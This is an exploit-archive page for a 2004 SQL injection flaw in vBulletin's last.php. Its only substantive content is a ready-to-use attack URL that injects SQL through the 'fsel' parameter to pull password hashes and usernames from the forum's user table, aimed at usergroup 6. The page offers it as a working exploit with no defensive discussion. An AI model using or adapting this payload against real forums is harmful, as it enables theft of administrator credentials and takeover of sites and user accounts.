[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : vBulletin LAST.PHP SQL Injection Vulnerability
# Published : 2004-11-15
# Author : n/a
# Previous Title : TWiki 20030201 search.pm Remote Command Execution Exploit
# Next Title : UBB.threads 6.2.*-6.3.* one char bruteforce exploit


Example:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201

# www.Syue.com [2004-11-15]